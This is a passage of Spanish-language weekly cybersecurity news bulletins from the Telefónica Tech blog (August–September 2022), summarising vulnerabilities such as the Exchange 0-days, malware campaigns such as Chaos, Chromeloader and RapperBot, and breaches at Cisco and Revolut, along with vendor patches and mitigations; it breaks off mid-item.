Explotadas dos vulnerabilidades 0-day en Microsoft Exchange El equipo de ciberseguridad vietnamita GTSC informó hace tres semanas, a través Zero Day Initiative (ZDI), de dos vulnerabilidades 0-day en Microsoft Exchange que estarían siendo activamente explotadas por actores amenaza. Encadenar ambos fallos de seguridad permitirían a un atacante la ejecución remota de código (RCE) en los sistemas comprometidos. Registrados como CVE-2022-41040 y CVE-2022-41082, la primera vulnerabilidad consiste en una falsificación de solicitud del lado del servidor (SSRF) permitiendo a un atacante autenticado activar y explotar de forma remota la segunda vulnerabilidad. Según los investigadores se han detectado campañas activas donde se hace uso del par de 0-days para la implementación del popular web shell, China Chopper, en servidores vulnerables. Una vez comprometido el sistema y obtenida la persistencia, el script malicioso recopilará información y se moverá de forma lateral hacia otros sistemas de las redes de sus víctimas. Por el momento Microsoft recomienda valorar la implementación de una mitigación temporal que bloquearía intentos de ataque al agregar una nueva regla en IIS mediante el módulo URL Rewrite Rule. Más info ⇾ * * * Vulnerabilidad crítica en Sophos Firewall explotada activamente Sophos ha reportado el hallazgo de una vulnerabilidad crítica que afecta al Portal de usuario y Webadmin de Sophos Firewall y que permitiría a un atacante la ejecución remota de código (RCE). El fallo de seguridad, catalogado como CVE-2022-3236 con CVSS de 9.8, estaría siendo utilizado en campañas que principalmente afectan a organizaciones de la región sur de Asia, las cuales ya han sido informadas según comunicó la compañía. Desde Sophos se ha lanzado correcciones para afrontar esta vulnerabilidad que afecta a las versiones de Sophos Firewall v19.0 MR1 (19.0.1) y anteriores. Por defecto el Firewall de Sophos aplica las nuevas versiones sin necesidad de acción alguna por parte de los clientes, los usuarios sin esta configuración predeterminada habilitada deberán actualizar de forma manual a la nueva versión. Si no fuese posible aplicarla, la compañía aconseja deshabilitar el acceso WAN al Portal de usuario y Webadmin. Más info ⇾ * * * Chaos: malware versátil basado en GO Investigadores de Black Lotus Labs han lanzado un comunicado con información sobre el malware Chaos, una nueva botnet multifuncional basada en GO que está experimentando una rápida expansión en los últimos meses. Detectada por primera vez en abril, Chaos está desarrollado para dispositivos Windows y Linux, con capacidad para infectar varios tipos de arquitecturas, tiene funcionalidades para realizar ataques DDoS, criptomineria, establecer persistencia y propagarse automáticamente, ya sea por fuerza bruta sobre claves privadas SSH o utilizando claves SSH robadas. El malware se ha asociado a un actor amenaza chino, dado el lenguaje en el que está escrito y el uso de una infraestructura de command-and-control (C2) basada en China. Aunque las víctimas de sus ataques suelen ser objetivos europeos, los bots también están siendo distribuidos a través de dispositivos en América y Asia, dirigido a una amplia gama de industrias, así como en dispositivos y sistemas no tan ligados a un ámbito empresarial, como pueden ser routers SOHO, o el sistema operativo FreeBSD. Más info ⇾ * * * Nuevo malware en VMware ESXi con capacidades backdoor El equipo de investigación de Mandiant ha descubierto una nueva familia de malware dirigida a sistemas VMware y destinada a la instalación de múltiples puertas traseras persistentes en los hipervisores ESXi. Mandiant involucra en su descubrimiento al actor amenaza rastreado como UNC3886, el cual parece haberse centrado en desarrollar e implementar malware sobre sistemas que normalmente no admiten EDR. Actualmente dirigido a VMware ESXi, servidores Linux vCenter y máquinas virtuales de Windows, el software malicioso detectado permitiría transferir archivos entre hipervisores y máquinas invitadas, modificar los registros y ejecutar comandos arbitrarios entre máquinas virtuales. Además, permitiría mantener persistencia como administrador en los sistemas infectados gracias a la instalación de los backdoors denominados por los investigadores como VirtualPita y VirtualPie, a través de paquetes de instalación maliciosos de vSphere ("VIB"). Más info ⇾ * * * WhatsApp corrige vulnerabilidades 0-day críticas Durante los últimos días se ha conocido que WhatsApp habría corregido dos vulnerabilidades 0-day que afectaban a versiones de Android e iOS y que habrían recibido una calificación CVSS de hasta 9.8, lo que las convertiría en críticas. Ambos fallos, CVE-2022-36934 y CVE-2022-27492, permitirían a los atacantes ejecutar código arbitrario de forma remota. En el caso de la primera, se trata de una vulnerabilidad de desbordamiento de Integer que permite la ejecución de código mediante una videollamada sin necesidad de interacción por parte del usuario, al aprovecharse de fallos en el código del componente Video Call Handler, y se encuentra presente en versiones de WhatsApp anteriores a la v2.22.16.12. En cuanto a la segunda, se trata de un fallo de subdesbordamiento de Integer que, por el contrario, sí requiere de interacción del usuario. Para su explotación, el atacante enviará un archivo de vídeo manipulado vía WhatsApp que permitirá la manipulación de componentes de Video Call Handler y provocará fallos adicionales de corrupción de memoria. Las versiones de WhatsApp afectadas por esta vulnerabilidad son las anteriores a la v2.22.16.2 en Android y v2.22.15.9 en iOS. Por el momento no se conocen intentos activos de explotación de ambos fallos. Más info ⇾
30 de septiembre de 2022
Boletín semanal de ciberseguridad, 17 — 23 de septiembre
Ransomware Quantum y BlackCat utilizan emotet como vector de entrada El equipo de investigadores de AdvIntel ha publicado los resultados de una investigación en la que informan que los operadores de ransomware Quantum y BlackCat han adoptado entre sus TTP el uso de Emotet como dropper en sus operaciones. En concreto Emotet surgió en 2014 clasificado como un troyano bancario, sin embargo, su evolución terminó por convertirlo en una botnet que los operadores del ransomware Conti utilizaron en sus operaciones hasta junio de 2022, momento en que fue disuelto. Actualmente la metodología adoptada por Quantum y BlackCat para utilizar Emotet, es instalando una baliza Cobalt Strike que despliega un payload que les permite tomar el control de las redes y ejecutar operaciones de ransomware. Según los expertos Emotet ha incrementado su actividad desde inicios de año distribuyéndose mediante archivos .lnk, y se estima que hay más de 1.2 millones de equipos infectados. Este incremento también ha sido corroborado por otros equipos de investigadores como ESET o Agari. Mas info → * * * Revolut sufre una filtración de datos con más de 50.000 usuarios expuestos El banco virtual Revolut, con licencia bancaria en Lituania, ha sido víctima de un ciberataque donde supuestamente se habría visto comprometida la información personal de más de 50.000 clientes. El incidente que se produjo hace una semana, ha sido descrito como “altamente dirigido”. Según la Agencia de Protección de Datos de Lituania 50.150 clientes se han visto afectados, de los cuales 20.687 pertenecen al Espacio Económico Europeo. Por el momento no se ha revelado los detalles de cómo el atacante accedió a la base de datos del banco, pero todo indica que el actor amenaza se basó en un ataque de ingeniería social como vector de entrada. La Agencia señala que la información expuesta incluye: direcciones de correo electrónico, nombres y apellidos, direcciones postales, números de teléfono, datos limitados de tarjetas de pago y datos de la cuenta. Revolut ha emitido un comunicado en el que sostiene que los datos personales comprometidos varían según los clientes y que no se han accedido a los datos de las tarjetas ni a las contraseñas. Mas info → * * * Vulnerabilidades críticas en entornos de sistemas de control industrial La agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) ha emitido un total de ocho avisos de seguridad alertando sobre vulnerabilidades en sistemas de control industrial (ICS por sus siglas en inglés), entre los que destaca los fallos críticos que afectan a productos Dataprobe iBoot-PDU. Cabe indicar que las unidades de distribución de energía (PDU) son utilizadas para administrar de forma remota la alimentación de energía de sistemas comúnmente utilizados en infraestructuras críticas. Investigadores de seguridad de Claroty descubrieron hasta un total de siete vulnerabilidades en el producto de la compañía Dataprobe, entre las que destacan la CVE-2022-3183 y CVE-2022-3184 que disponen de un CVSS de 9.8. En concreto, estos fallos de seguridad podrían permitir a actores maliciosos el acceso a usuarios no autenticados y ejecutar código de forma remota en los sistemas afectados. David Weiss, CEO de Dataprobe, ha indicado que los problemas de seguridad han sido parcheados en la versión 1.42.06162022 y que otros son solucionados mediante la configuración adecuada como deshabilitar SNMP, telnet y HTTP. Mas info → * * * Vulnerabilidad antigua en Python afecta a miles de repositorios Investigadores de Trellix han hecho públicos los detalles de explotación de una vulnerabilidad en el lenguaje de programación Python que se ha pasado por alto durante 15 años. El error podría afectar a más de 350.000 repositorios de código abierto y podría conducir a la ejecución de código. El reporte explica que redescubrieron la vulnerabilidad mientras se revisaban otros errores no relacionados, concluyendo que se trataba del CVE-2007-4559, ya documentado en un informe inicial en agosto del 2007, y que ha permanecido sin parchear hasta hoy en día. Únicamente, durante este año 2022, desde el seguimiento de errores de este lenguaje (Python Bug Tracker), se aportó una actualización de la documentación que sólo advertía a los desarrolladores sobre el riesgo. Por su parte Trellix señala que el error persiste aportando videos explicativos sobre su explotación. La vulnerabilidad se ubica en las funciones extract y extractall del módulo tarfile, que permitiría a un atacante sobrescribir archivos arbitrarios agregando la secuencia ".." a los nombres de archivo en un fichero TAR. Adicionalmente Trellix ha anunciado parches para algo más de 11.000 proyectos, si bien, por el momento, la Python Software Foundation no se ha pronunciado sobre la vulnerabilidad, por lo que se recomienda extremar las precauciones al tratarse de un error que representa un claro riesgo para la cadena de suministro de software. Mas info → * * * Malware Chromeloader aumenta su actividad y potencia sus capacidades Investigadores de Microsoft y VMware han reportado una campaña maliciosa por parte del malware Chromeloader, extensión maliciosa para el navegador Chrome, destinada a infectar los dispositivos de sus víctimas con múltiples programas dañinos. Durante el primer trimestre de 2022, Chromeloader destacó en forma de adware para convertirse posteriormente en un stealer especializado en sustraer datos almacenados en los navegadores de los usuarios objetivo. Sin embargo, según Microsoft, actualmente existe una campaña en curso atribuida al actor amenaza rastreado como DEV-0796, el cual hace uso de este software malicioso para lanzar payloads mucho más potentes y dirigidos. En concreto se ha detectado la implementación de Chromeloader en archivos ISO que se distribuyen a través de anuncios maliciosos y comentarios de videos de YouTube. Asimismo, tal y como también detalla VMware en su reporte, existen al menos 10 variantes de este malware camuflado bajo utilidades destinadas a la gestión de subtítulos para películas, reproductores de música y, más preocupante, una variante de Chromeloader que implementa el ransomware Enigma en un archivo HTML. Mas info →
23 de septiembre de 2022
Boletín semanal de ciberseguridad, 9 — 16 de septiembre
Microsoft corrige dos 0-day y otras 63 vulnerabilidades en su Patch Tuesday Microsoft ha corregido, en su Patch Tuesday correspondiente al mes de septiembre, 63 vulnerabilidades entre las que se encuentran dos 0-day, uno de ellos activamente explotado y 5 fallos críticos que permitirían la ejecución remota de código. El 0-day activamente explotado, identificado como CVE-2022-37969 y CVSS 7.8, fue descubierto por investigadores de DBAPPSecurity, Mandiant, CrowdStrike y Zscaler y afecta al sistema de archivos de registro común (CLFS), permitiendo que un atacante pueda obtener privilegios de sistema. Por otro lado, el segundo 0-day que no ha sido explotado, se ha catalogado como CVE-2022-23960 y con CVSS 5.6, y hace referencia a una vulnerabilidad de restricción de especulación en la caché. En cuanto a las vulnerabilidades críticas, 2 se encuentran en Microsoft Dynamics CRM (CVE-2022-35805 y CVE-2022-34700), otras 2 en IKE (CVE-2022-34722 y CVE-2022-34721) y, por último, un fallo en Windows TCP/IP (CVE-2022-34718), todos ellos permitirían la ejecución remota de código. Más info → * * * Análisis del keylogger OriginLogger El investigador Jeff White, de la Unit 42 de Palo Alto, ha publicado los resultados de su reciente análisis sobre el keylogger OriginLogger, considerado heredero de Agent Tesla. Utilizado para el robo de credenciales, capturas de pantalla y todo tipo de información del dispositivo, se encuentra a la venta en sitios especializados en la difusión de malware. Su cadena de infección se inicia a través de diferentes tipos de droppers, si bien normalmente se trata de un documento de Microsoft Office con macros maliciosas, que redirigen a una página de la que se descarga un archivo con un script ofuscado, utilizado para descargar un payload que servirá para crear persistencia y programar diferentes tareas. El payload contendrá además código PowerShell y dos binarios cifrados, uno de los cuales es un loader y el otro el payload real de OriginLogger. Otra de las características que hacen a OriginLogger una versión separada de Agent Tesla es la variedad de métodos de exfiltración de información, usando protocolos y servidores SMTP y FTP, páginas web con paneles propios o canales y bots de Telegram. Más info → * * * Lampion malware distribuido en nueva campaña de phishing Investigadores de Cofense han analizado una campaña de phishing distribuida por email, en la que el adjunto contiene un script que descarga y ejecuta el malware Lampion. Dicho malware, descubierto en 2019, corresponde con un troyano bancario que busca robar la información del dispositivo infectado, conecta con su servidor command-and-control (C2) y es capaz de superponer una página encima de los formularios de login bancarios para hacerse con la información del usuario. Sobre la campaña, se distribuye mediante el envío a través de cuentas corporativas sustraídas de distintos correos fraudulentos, que adjuntan pruebas de pago maliciosas alojadas en WeTransfer y urgen a que sean descargadas. Una vez que el receptor del email fraudulento se descarga el documento malicioso y lo abre, se ejecutan varios scripts VBS y la cadena de ataque comienza. Cabe destacar que, Lampion se centra principalmente en objetivos de habla hispana, abusando de los servicios en la nube para alojar el malware, incluyendo Google Drive y pCloud. Más info → * * * Boletines de seguridad de SAP SAP ha publicado 16 notas de seguridad en su Security Patch Day de septiembre, en las que corrige 55 vulnerabilidades de Chromium y otras de alta prioridad. En primer lugar, SAP emite actualizaciones de seguridad para el navegador Google Chromium que afecta a varias versiones de SAP Business Client. Por otro lado, entre las vulnerabilidades de alta prioridad corregidas, se encuentra una vulnerabilidad XSS que afecta a SAP Knowledge Warehouse, identificada como CVE-2021-42063 y con CVSS 8.8. Asimismo, entre las más críticas se encuentra CVE-2022-35292, con CVSS de 7.8, que afecta a la ruta del servicio en SAP Business One y que permitiría la escalada de privilegios a SYSTEM. La segunda nota de prioridad corresponde al servicio SAP BusinessObjects, afectado con dos vulnerabilidades, una de ellas, con CVE-2022-39014 y CVSS 7.7, haría posible que un atacante lograra acceder a información confidencial sin cifrar; mientras que, la otra vulnerabilidad designada con CVE-2022-28214 y CVSS 7.8, corrige ante la posibilidad de la divulgación de información en el servicio. Finalmente, se publica una actualización relacionada con la vulnerabilidad, CVE-2022-35291 y CVSS 8.1, que afecta a SuccessFactors, mediante la cual se reanuda la funcionalidad de archivos adjuntos. * * * Análisis sobre las actividades de Webworm El equipo de investigación de amenazas de Symantec ha publicado en el día de ayer un post en el que se detallan las actividades del grupo denominado Webworm, cuyas TTPs y artefactos en uso serían los mismos que los del actor amenaza conocido como Space Pirates, lo que lleva a los investigadores a creer que podrían ser el mismo grupo. Según la investigación, el grupo llevaría activo desde 2017 y se habría dedicado a lanzar ataques y campañas de espionaje contra agencias gubernamentales y compañías de los sectores IT, aeroespacial y energético, especialmente en países asiáticos. Entre sus recursos habituales, se encuentran versiones modificadas de los troyanos de acceso remoto Trochilus, Gh0st RAT y 9002 RAT, usados como puerta trasera y difundidos mediante loaders ocultos en documentos falsos. Por último, cabe destacar que los RAT utilizados por Webworm siguen siendo difíciles de detectar por las herramientas de seguridad, debido a que sus trucos de evasión, ofuscación y antianálisis siguen siendo notables. Más info →
16 de septiembre de 2022
Boletín semanal de ciberseguridad, 27 de agosto — 2 de septiembre
Vulnerabilidad crítica en Atlassian Bitbucket Server and Data Center La compañía Atlassian ha informado recientemente acerca de una nueva vulnerabilidad crítica que afecta a su software Bitbucket Server and Data Center y que debe parchearse de forma inmediata. La vulnerabilidad, CVE-2022-36804, ha recibido un CVSS v3 de 9.9 según el fabricante, y se trata de un fallo que permite la inyección de comandos a través de peticiones http especialmente diseñadas que derivarían en ejecución de código arbitrario. La vulnerabilidad no requiere de una gran complejidad o de privilegios muy elevados a la hora de explotarla, ya que solo se necesitan permisos de lectura a un repositorio público o privado y tampoco se requiere de interacción con el usuario. Las versiones de Bitbucket Server and Data Center afectadas son todas entre la 6.10.17 y la 8.3.0, y se han publicado ya versiones actualizadas de la 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2 y 8.3.1. Las versiones 6.X no recibirán parche alguno. Para todos aquellos que no puedan actualizar inmediatamente su versión, se recomienda apagar los repositorios públicos. Por su parte, el investigador Max Garrett, quien descubrió la vulnerabilidad y la reportó a Atlassian, ha asegurado que publicará una prueba de concepto en 30 días, indicando además que el parche de Atlassian no debería ser muy difícil de eludir. Más info → * * * Intellexa ofrece un exploit 0-day para IOS y Android Recientemente se ha filtrado un documento de la empresa de origen israelí, Intellexa, subido a redes a través del Twitter de VX-underground, en el que se observa una oferta comercial de un spyware por 8 Millones de euros. El spyware funciona en la versión 15.4.1 de IOS y la versión 12 de Android y, al ser un 0-day, es poco probable que haya sido parcheado y no funcione en nuevas versiones de estos sistemas operativos. Este exploit permitiría acceder de forma remota a los datos de los dispositivos impactados. El vector de infección, según indica el documento, sería un link al que es necesario acceder para que se pueda inyectar el payload en el dispositivo. Asimismo, en la oferta se incluye un año de garantía, una plataforma para analizar los datos extraídos, así como diez tipos de infecciones concurrentes y un catálogo de otras cien infecciones exitosas a modo de ejemplo. Más info → * * * Uso de vulnerabilidades Log4j contra organizaciones israelíes Microsoft ha publicado detalles de una nueva investigación realizada por su centro de inteligencia de amenazas (MSTIC) en la que se reporta la campaña de ataques del actor malicioso MuddyWater (referido como Mercury por Microsoft) contra objetivos en el estado de Israel. De acuerdo a la investigación, este actor amenaza estaría intentando explotar la conocida vulnerabilidad Log4Shell para comprometer software sin parchear, concretamente SysAid, un programa de gestión informática, en lugar de software de VMware, como el grupo vendría haciendo de forma tradicional. En sus ataques, MuddyWater explotaba la vulnerabilidad como vector de acceso inicial, para luego utilizar una web shell para ejecutar comandos maliciosos, crear usuarios y elevar sus privilegios a nivel de administrador, robar credenciales a través de Mimikatz, y moverse lateralmente a través de herramientas como RemCom o Windows Management Instrumentation. Para evitar este tipo de ataques, se recomienda aplicar los parches disponibles para las vulnerabilidades Log4j desde enero de este año. Más info → * * * Detectadas más de 1.000 aplicaciones iOS que exponen credenciales de AWS codificadas Investigadores del equipo Threat Hunting de Symantec han detectado cerca de 2.000 aplicaciones móviles que contienen credenciales de AWS (Amazon Web Services) codificadas. En concreto, la mayoría de las apps (1.856) corresponden al sistema iOS, mientras que sólo 37 pertenecen a Android, de todas ellas, en el 77% se han localizado tokens de acceso válidos de AWS que podrían usarse para acceder directamente a servicios de nube privada. Además, esos tokens de AWS válidos podrían ser utilizados por parte de un atacante para acceder a instancias en la nube donde se encuentran bases de datos de servicios activos que contienen millones de registros, incluyendo detalles de cuentas de usuario, comunicaciones internas y otros datos confidenciales, según el tipo de aplicación. La investigación realizada por Symantec pretende poner en alerta a los desarrolladores de aplicaciones móviles a la hora de confiar en exceso o hacer uso de prácticas inseguras que exponen credenciales de AWS, lo que podría provocar que la cadena de suministro de aplicaciones móviles sea vulnerable, así como abrir la puerta a actores malintencionados a bases de datos privadas, derivando en posibles filtraciones de datos y exposición de los datos personales de los usuarios finales. More info → * * * Google corrige 24 vulnerabilidades en Chrome En su última actualización, Google ha parcheado 24 vulnerabilidades, entre ellas una categorizada como de severidad crítica (CVE-2022-3038), y ha incorporado el sistema “Sanitizer”, que añade protección contra inyecciones XSS. La gran parte de las vulnerabilidades corregidas eran relativas a fallos en la gestión de memoria, con errores del tipo use-after-free o desbordamiento de búfer que afectaban a complementos como WebUI y Screen Capture. También se han corregido varias vulnerabilidades de políticas de seguridad y errores de implementación inapropiada. Cabe destacar que a pesar de que no haya evidencias de que estas vulnerabilidades estén siendo explotadas, hay una vulnerabilidad de carácter grave que no ha sido corregida y que afecta al portapapeles del sistema operativo a través de navegadores basados en Chromium, la cual puede ser aprovechada sin autorización ni interacción por parte del usuario. Desde Google recomiendan actualizar el navegador a su última versión. Más info →
2 de septiembre de 2022
Boletín semanal de ciberseguridad, 8 — 19 de agosto
Google informa del mayor ataque DDoS de la historia Investigadores de Google han informado acerca del mayor ataque de DDoS jamás registrado hasta el momento. En concreto, el pasado 1 de junio, un cliente de Google Cloud Armor recibió una serie de ataques HTTPs DDoS, que alcanzaron los 46 millones de solicitudes por segundo (RPS). Este ataque DDoS de capa 7 se ha convertido en el mayor ataque de este tipo, siendo un 76% más grande que el mayor ataque conocido hasta la fecha. Según los investigadores, el ataque se ejecutó desde 5.256 direcciones IP distribuidas en 132 países, aprovechándose de las solicitudes cifradas (HTTPS). Asimismo, de las solicitudes, el 3% se ejecutó desde nodos de salida de la red Tor. Los investigadores han determinado que la distribución geográfica y los tipos de servicios no seguros aprovechados para generar el ataque coinciden con la familia de ataques de la botnet Mēris. El ataque duró aproximadamente 69 minutos y se detuvo cuando, según creen los investigadores, el actor se habría percatado de que el ataque no estaba teniendo el impacto esperado teniendo en cuenta los recursos empleados. Desde Cloud Armor se pudo bloquear el ataque, pudiendo mantener la víctima sus servicios en línea. Más info → * * * Cisco sufre un incidente de ciberseguridad Cisco ha emitido un comunicado en el que confirma que, a finales de mayo, el día 24, fue víctima de un compromiso de datos. Según indica la empresa, el vector de entrada fue el robo de las credenciales de Google de un empleado almacenadas en el navegador. Mediante ingeniería social y ataques de phishing consiguieron que el empleado aceptase notificaciones multifactor maliciosas, accediendo así a la VPN corporativa y elevando privilegios desde la misma. Asimismo, la autoría se la ha atribuido el grupo Yanluowang ransomware, que confirma que la brecha de datos alcanza 2,75GB de información repartidos en 3.100 archivos a través de un mail enviado a Bleeping Computer, asegurando su autoría y aportando pruebas. Por otra parte, desde Cisco indican que los atacantes solo pudieron robar datos no sensibles de una carpeta vinculada a la cuenta del empleado comprometido, añadiendo que no encontraron evidencias de que hayan conseguido acceder a documentación interna de carácter crítico como la relacionada con el desarrollo de productos, datos sensibles de clientes o empleados, y afirma que no se habría llegado a desplegar el ransomware ya que no han sufrido cifrado de ninguno de sus datos. Más info → * * * Corregidas 11 vulnerabilidades en Chrome Google ha lanzado la versión 104.0.5112.101 de Stable Channel para Mac y Linux, y la versión 104.0.5112.102/101 para Windows, donde se corrigen un total de 11 vulnerabilidades. De entre estas vulnerabilidades cabe destacar la catalogada como CVE-2022-2856, debido a que se habría detectado su explotación activa. Esta vulnerabilidad fue descubierta por los investigadores de Google Threat Analysis Group, Ashley Shen y Christian Resell, y se trata de unavalidación insuficiente de los inputs no confiables en Intents. Por otro lado, también cabe destacar la vulnerabilidad CVE-2022-2852, ya que ha sido catalogada como crítica. Esta vulnerabilidad fue descubierta por Sergei Glazunov de Google Project Zero, siendo un fallo de use after free en FedCM. Por el momento Google no ha ofrecido más detalles de las vulnerabilidades con el fin de permitir que la mayoría de los usuarios realicen la actualización. Más info → * * * Microsoft alerta de campañas de phishing en curso del actor SEABORGIUM Investigadores del Microsoft Threat Intelligence Center (MSTIC) han publicado un aviso en el que advierte de nuevas campañas de phishing realizadas por el actor amenaza SEABORGIUM, también conocido como ColdRiver o TA446. Estas campañas estarían dirigidas principalmente a organizaciones e integrantes de la OTAN con el fin de obtener información confidencial, si bien desde Microsoft han detectado ataques contra países del Báltico, Nórdicos y Europa del Este. SEABORGIUM dirige principalmente sus ataques contra empresas de defensa e inteligencia, organizaciones no gubernamentales (ONG) y organizaciones intergubernamentales (OIG), think tanks y educación superior. Para llevar a cabo el robo de credenciales, los operadores de SEABORGIUM utilizan ingeniería social para engañar a sus víctimas con perfiles fraudulentos en redes sociales, que finalmente terminan con el envío de correos electrónicos de phishing con URLs o archivos adjuntos maliciosos donde la víctima introduce sus credenciales. Más info → * * * Nuevo ransomware GwisinLocker Investigadores de seguridad han localizado una nueva familia de ransomware, llamada GwisinLocker, dirigido a empresas de salud, industriales y farmacéuticas de Corea del Sur, con capacidad de cifrar servidores Windows y Linux, incluidos servidores ESXi y máquinas virtuales. Operado por el actor amenaza Gwisin, que significa "fantasma" o "espíritu" en coreano, se especula, por los datos de las notas de rescate, podría estar en manos de un grupo de amenaza persistente avanzada (APT) vinculado a Corea del Norte. En dispositivos Windows, la infección se inicia con la ejecución de un instalador MSI que precisa de parámetros especiales en la consola de comandos para ejecutar el archivo DLL incluido en el propio MSI. Este DLL llevará a cabo acciones de cifrado al inyectarse en un proceso del sistema de Windows, consiguiendo de este modo evadir la detección de los sistemas antivirus. Asimismo, admite una función para cifrar archivos en modo seguro. Para la versión de Linux, la muestra analizada apunta a que se trataría de un sofisticado malware con características especialmente diseñadas para gestionar servidores Linux y que tiene como objetivo las máquinas virtuales VMware ESXi. Cabe destacar que GwisinLocker combina el cifrado de clave simétrica AES con el hash SHA256, generando una clave única para cada archivo. Más info→
19 de agosto de 2022
Los 4 posts más leídos sobre ciberseguridad de este año
En nuestro recopilatorio semanal del verano con los contenidos más relevantes y más leídos del blog de Telefónica Tech desde principios de este año, en esta ocasión os traemos los 4 posts sobre ciberseguridad que más visitas han tenido. Léelos y atrévete a descubrir el por qué. Diferencias entre cifrado, hashing, codificación y ofuscación Lo primero es dejar claros los términos a los que nos enfrentamos en estas lecturas y, para ello, nada mejor que este post donde aprendemos a diferenciar entre términos muy relevantes dentro de la ciberseguridad. Cyber Security Diferencias entre cifrado, hashing, codificación y ofuscación 1 de junio de 2022 ¿Dónde sitúas a tu empresa en el camino hacia la ciberseguridad? Este post pondrá a prueba tu percepción sobre cómo ves a tu empresa frente a la protección dde posibles ataques. ¿Te atreves con ello? Cyber Security ¿Dónde sitúas a tu empresa en el camino hacia la ciberseguridad? 20 de abril de 2022 En qué consiste el convenio de Budapest y cómo regula la ciberdelincuencia Si eres un apasionado del mundo de la ciberseguridad y todavía no saber qué es el convenio de Budaapest, no esperes más para leer este post. CYBER SECURITY En qué consiste el convenio de Budapest y cómo regula la ciberdelincuencia 6 de enero de 2020 Cómo funciona Lokibot Damos un paso más y subimos de nivel con este post donde te contamos qué es y cómo trabaja Lokibot. Cyber Security Cómo funciona Lokibot, el malware que utiliza Machete para robar información y credenciales de acceso 29 de junio de 2022
10 de agosto de 2022
Boletín semanal de ciberseguridad, 30 julio-5 agosto
Posible relación entre el malware Raspberry Robin y las infecciones de Evil Corp El equipo de Microsoft Threat Intelligence Center (MSTIC) ha publicado nueva información sobre el malware Raspberry Robin, detectado por primera vez por el equipo de Red Canary en septiembre del pasado año 2021 [1]. El principal método de propagación asociado a esta familia es a través de dispositivos USB infectados, y una de sus características principales es el uso de dispositivos NAS de QNAP como servidores de Command & Control (C2). En su actualización, los expertos de Microsoft habrían descubierto que Raspberry Robin, en fases más avanzadas, está implementando en las redes infectadas el malware FakeUpdates, vinculado tradicionalmente al actor DEV-0206. Sin embargo, la actividad observada una vez se consigue distribuir FakeUpdates conduce a acciones que tradicionalmente se han ligado a las llevadas a cabo por DEV-0243 (Evil Corp) antes de sus infecciones con ransomware. En cuanto a la afectación, cabe destacar que se advierte de la detección de actividad de este malware en cientos de organizaciones de multitud de sectores. [1] https://redcanary.com/blog/raspberry-robin/ Más info: https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0206-DEV-0243 Aviso de seguridad crítico de VMware VMware ha emitido un aviso de seguridad crítico (VMSA-2022-0021) donde informa acerca de diez vulnerabilidades recientemente detectadas y parcheadas. Entre estas, destaca por su criticidad la descubierta por el investigador de VNG Security, Petrus Viet, y catalogada como CVE-2022-31656 con un CVSSv3 de 9.8. Se trata de una vulnerabilidad de omisión de autenticación que afecta a los usuarios del dominio local y que podría permitir a un atacante no autenticado obtener privilegios de administrador. En relación al resto de vulnerabilidades, seis de ellas han sido catalogadas con un riesgo “importante” (CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664, CVE-2022-31665) y tres con riesgo “moderado” (CVE-2022-31657, CVE-2022-31662, CVE-2022-31663), encontrándose entre ellas, fallos de ejecución remota de código, escalada de privilegios y cross-site scripting (XSS), entre otros. Estos errores afectan a los productos VMware Workspace ONE Access (Access), VMware Workspace ONE Access Connector (Access Connector), VMware Identity Manager (vIDM), VMware Identity Manager Connector (vIDM Connector), VMware vRealize Automation (vRA), VMware Cloud Foundation, y vRealize Suite Lifecycle Manager. Finalmente, cabe destacar que por el momento no se ha detectado su explotación activa, si bien desde VMware instan a implementar los parches lo antes posible. Más info: https://www.vmware.com/security/advisories/VMSA-2022-0021.html Vulnerabilidades en Apache HTTP Server Se han descubierto múltiples vulnerabilidades en Apache HTTP Server que afectan a las versiones previas a la 2.4.54. Un atacante remoto podría explotar algunas de estas vulnerabilidades para desencadenar una condición de denegación de servicio, divulgación de información confidencial, cross-site scripting (XSS), o evasión de restricciones de seguridad en el sistema objetivo. De las vulnerabilidades encontradas, destaca la catalogada como CVE-2022-31813 [1] por tener un CVSSv3 de 9,8 y cuya explotación permitiría la evasión de control de autenticación basado en IP al no enviar, bajo ciertas condiciones, cabeceras X-Forwarder-*. Asimismo, señalar que estos fallos afectan a muchos productos que hacen uso del servidor Apache como IBM [2] o F5 [3] y, por ello, se recomienda actualizar Apache HTTP Server lo antes posible siguiendo las instrucciones del proveedor. [1] https://nvd.nist.gov/vuln/detail/CVE-2022-31813 [2] https://www.ibm.com/support/pages/node/6595149 [3] https://support.f5.com/csp/article/K21192332 Más info: https://httpd.apache.org/security/vulnerabilities_24.html Vulnerabilidad de ejecución remota de código en routers DrayTek El equipo de Trellix Threat Labs ha detectado una importante vulnerabilidad de ejecución remota de código que afectaría a routers del fabricante DrayTek. La explotación de la vulnerabilidad, rastreada como CVE-2022-32548 - CVSSv3 10.0 [1], permitiría la ejecución de ataques que no requieren la interacción del usuario, siempre y cuando la interfaz de administración del dispositivo esté configurada para servicios de red. En caso de éxito, el atacante conseguiría acceder a los recursos internos del dispositivo, comprometerlo por completo, e incluso lanzar ataques dentro de la LAN desde la propia configuración predeterminada del dispositivo. El fallo afecta al modelo Vigor 3910 junto a otros 28 modelos de DrayTek que comparten la misma base de código y ya ha sido debidamente parcheado por la compañía. Asimismo, Trellix ha publicado un video [2] detallando el proceso de explotación de está vulnerabilidad, por lo que se recomienda no exponer la interfaz de administración a Internet, resetear las contraseñas y actualizar el software de los dispositivos afectados a la última versión. [1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32548 [2] https://youtu.be/9ZVaj8ETCU8 Más info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html RapperBot: nueva botnet enfocada a sistemas Linux Investigadores de seguridad de Fortinet han descubierto una nueva botnet, denominada RapperBot, que apunta específicamente a sistemas Linux. Este nuevo malware estaría basado en el código fuente original de la botnet Mirai, pero destaca por disponer de características únicas y poco frecuentes en este tipo de malware, como su propio protocolo de Command & Control (C2). Además, a diferencia de Mirai, RapperBot se centra en el uso de técnicas de fuerza bruta para acceder a servidores SSH en lugar de Telnet, lanzando pruebas sobre listas de credenciales descargadas por el malware desde sus propios recursos. Si logra acceder al servidor, el bot añade una nueva clave SSH y crea una tarea Cron que vuelve a añadir al usuario cada hora en caso de que un administrador descubra la cuenta y la elimine. Por el momento se desconoce cuál puede ser el objetivo principal de RapperBot, ya que sus autores han mantenido sus funciones DDoS limitadas. Sin 